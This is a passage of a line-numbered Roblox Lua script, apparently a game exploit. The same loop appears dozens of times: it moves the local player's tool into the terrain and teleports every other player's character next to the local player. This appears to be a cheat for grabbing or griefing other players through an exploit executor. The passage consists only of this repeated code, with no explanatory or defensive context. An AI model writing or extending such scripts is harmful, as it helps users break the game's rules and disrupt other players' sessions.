  4716.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4717.   wait()
  4718.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4719.  
  4720. end
  4721. wait(0.01)
  4722.  
  4723. end
  4724. for i, v in pairs(game.Players:GetPlayers()) do
  4725. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4726.  
  4727. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4728.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4729.  
  4730.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4731.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4732.   wait()
  4733.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4734.  
  4735. end
  4736. wait(0.01)
  4737.  
  4738. end
  4739. for i, v in pairs(game.Players:GetPlayers()) do
  4740. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4741.  
  4742. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4743.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4744.  
  4745.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4746.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4747.   wait()
  4748.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4749.  
  4750. end
  4751. wait(0.01)
  4752.  
  4753. end
  4754. for i, v in pairs(game.Players:GetPlayers()) do
  4755. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4756.  
  4757. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4758.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4759.  
  4760.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4761.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4762.   wait()
  4763.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4764.  
  4765. end
  4766. wait(0.01)
  4767.  
  4768. end
  4769. for i, v in pairs(game.Players:GetPlayers()) do
  4770. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4771.  
  4772. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4773.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4774.  
  4775.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4776.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4777.   wait()
  4778.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4779.  
  4780. end
  4781. wait(0.01)
  4782.  
  4783. end
  4784. for i, v in pairs(game.Players:GetPlayers()) do
  4785. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4786.  
  4787. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4788.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4789.  
  4790.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4791.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4792.   wait()
  4793.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4794.  
  4795. end
  4796. wait(0.01)
  4797.  
  4798. end
  4799. for i, v in pairs(game.Players:GetPlayers()) do
  4800. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4801.  
  4802. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4803.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4804.  
  4805.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4806.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4807.   wait()
  4808.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4809.  
  4810. end
  4811. wait(0.01)
  4812.  
  4813. end
  4814. for i, v in pairs(game.Players:GetPlayers()) do
  4815. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4816.  
  4817. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4818.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4819.  
  4820.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4821.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4822.   wait()
  4823.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4824.  
  4825. end
  4826. wait(0.01)
  4827.  
  4828. end
  4829. for i, v in pairs(game.Players:GetPlayers()) do
  4830. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4831.  
  4832. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4833.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4834.  
  4835.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4836.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4837.   wait()
  4838.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4839.  
  4840. end
  4841. wait(0.01)
  4842.  
  4843. end
  4844. for i, v in pairs(game.Players:GetPlayers()) do
  4845. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4846.  
  4847. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4848.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4849.  
  4850.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4851.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4852.   wait()
  4853.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4854.  
  4855. end
  4856. wait(0.01)
  4857.  
  4858. end
  4859. for i, v in pairs(game.Players:GetPlayers()) do
  4860. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4861.  
  4862. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4863.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4864.  
  4865.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4866.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4867.   wait()
  4868.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4869.  
  4870. end
  4871. wait(0.01)
  4872.  
  4873. end
  4874. for i, v in pairs(game.Players:GetPlayers()) do
  4875. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4876.  
  4877. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4878.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4879.  
  4880.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4881.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4882.   wait()
  4883.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4884.  
  4885. end
  4886. wait(0.01)
  4887.  
  4888. end
  4889. for i, v in pairs(game.Players:GetPlayers()) do
  4890. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4891.  
  4892. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4893.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4894.  
  4895.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4896.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4897.   wait()
  4898.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4899.  
  4900. end
  4901. wait(0.01)
  4902.  
  4903. end
  4904. for i, v in pairs(game.Players:GetPlayers()) do
  4905. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4906.  
  4907. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4908.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4909.  
  4910.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4911.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4912.   wait()
  4913.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4914.  
  4915. end
  4916. wait(0.01)
  4917.  
  4918. end
  4919. for i, v in pairs(game.Players:GetPlayers()) do
  4920. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4921.  
  4922. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4923.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4924.  
  4925.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4926.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4927.   wait()
  4928.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4929.  
  4930. end
  4931. wait(0.01)
  4932.  
  4933. end
  4934. for i, v in pairs(game.Players:GetPlayers()) do
  4935. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4936.  
  4937. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4938.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4939.  
  4940.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4941.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4942.   wait()
  4943.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4944.  
  4945. end
  4946. wait(0.01)
  4947.  
  4948. end
  4949. for i, v in pairs(game.Players:GetPlayers()) do
  4950. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4951.  
  4952. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4953.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4954.  
  4955.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4956.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4957.   wait()
  4958.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4959.  
  4960. end
  4961. wait(0.01)
  4962.  
  4963. end
  4964. for i, v in pairs(game.Players:GetPlayers()) do
  4965. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4966.  
  4967. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4968.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4969.  
  4970.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4971.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4972.   wait()
  4973.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4974.  
  4975. end
  4976. wait(0.01)
  4977.  
  4978. end
  4979. for i, v in pairs(game.Players:GetPlayers()) do
  4980. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4981.  
  4982. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4983.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4984.  
  4985.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4986.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  4987.   wait()
  4988.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  4989.  
  4990. end
  4991. wait(0.01)
  4992.  
  4993. end
  4994. for i, v in pairs(game.Players:GetPlayers()) do
  4995. if v and v.Name ~= game.Players.LocalPlayer.Name then
  4996.  
  4997. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4998.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  4999.  
  5000.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5001.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5002.   wait()
  5003.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5004.  
  5005. end
  5006. wait(0.01)
  5007.  
  5008. end
  5009. for i, v in pairs(game.Players:GetPlayers()) do
  5010. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5011.  
  5012. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5013.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5014.  
  5015.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5016.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5017.   wait()
  5018.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5019.  
  5020. end
  5021. wait(0.01)
  5022.  
  5023. end
  5024. for i, v in pairs(game.Players:GetPlayers()) do
  5025. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5026.  
  5027. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5028.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5029.  
  5030.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5031.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5032.   wait()
  5033.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5034.  
  5035. end
  5036. wait(0.01)
  5037.  
  5038. end
  5039. for i, v in pairs(game.Players:GetPlayers()) do
  5040. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5041.  
  5042. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5043.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5044.  
  5045.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5046.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5047.   wait()
  5048.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5049.  
  5050. end
  5051. wait(0.01)
  5052.  
  5053. end
  5054. for i, v in pairs(game.Players:GetPlayers()) do
  5055. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5056.  
  5057. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5058.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5059.  
  5060.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5061.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5062.   wait()
  5063.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5064.  
  5065. end
  5066. wait(0.01)
  5067.  
  5068. end
  5069. for i, v in pairs(game.Players:GetPlayers()) do
  5070. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5071.  
  5072. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5073.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5074.  
  5075.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5076.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5077.   wait()
  5078.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5079.  
  5080. end
  5081. wait(0.01)
  5082.  
  5083. end
  5084. for i, v in pairs(game.Players:GetPlayers()) do
  5085. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5086.  
  5087. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5088.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5089.  
  5090.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5091.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5092.   wait()
  5093.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5094.  
  5095. end
  5096. wait(0.01)
  5097.  
  5098. end
  5099. for i, v in pairs(game.Players:GetPlayers()) do
  5100. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5101.  
  5102. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5103.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5104.  
  5105.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5106.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5107.   wait()
  5108.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5109.  
  5110. end
  5111. wait(0.01)
  5112.  
  5113. end
  5114. for i, v in pairs(game.Players:GetPlayers()) do
  5115. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5116.  
  5117. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5118.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5119.  
  5120.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5121.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5122.   wait()
  5123.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5124.  
  5125. end
  5126. wait(0.01)
  5127.  
  5128. end
  5129. for i, v in pairs(game.Players:GetPlayers()) do
  5130. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5131.  
  5132. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5133.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5134.  
  5135.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5136.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5137.   wait()
  5138.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5139.  
  5140. end
  5141. wait(0.01)
  5142.  
  5143. end
  5144. for i, v in pairs(game.Players:GetPlayers()) do
  5145. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5146.  
  5147. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5148.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5149.  
  5150.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5151.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5152.   wait()
  5153.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5154.  
  5155. end
  5156. wait(0.01)
  5157.  
  5158. end
  5159. for i, v in pairs(game.Players:GetPlayers()) do
  5160. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5161.  
  5162. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5163.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5164.  
  5165.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5166.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5167.   wait()
  5168.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5169.  
  5170. end
  5171. wait(0.01)
  5172.  
  5173. end
  5174. for i, v in pairs(game.Players:GetPlayers()) do
  5175. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5176.  
  5177. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5178.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5179.  
  5180.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5181.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5182.   wait()
  5183.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5184.  
  5185. end
  5186. wait(0.01)
  5187.  
  5188. end
  5189. for i, v in pairs(game.Players:GetPlayers()) do
  5190. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5191.  
  5192. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5193.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5194.  
  5195.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5196.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5197.   wait()
  5198.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5199.  
  5200. end
  5201. wait(0.01)
  5202.  
  5203. end
  5204. for i, v in pairs(game.Players:GetPlayers()) do
  5205. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5206.  
  5207. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5208.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5209.  
  5210.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5211.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5212.   wait()
  5213.   v.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players.LocalPlayer.Character.HumanoidRootPart.Position + game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame.rightVector)
  5214.  
  5215. end
  5216. wait(0.01)
  5217.  
  5218. end
  5219. for i, v in pairs(game.Players:GetPlayers()) do
  5220. if v and v.Name ~= game.Players.LocalPlayer.Name then
  5221.  
  5222. game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5223.   game.Players.LocalPlayer.Backpack:FindFirstChildOfClass("Tool").Parent = game.Players.LocalPlayer.Character
  5224.  
  5225.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5226.   game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Parent = game.Workspace.Terrain
  5227.   wait()
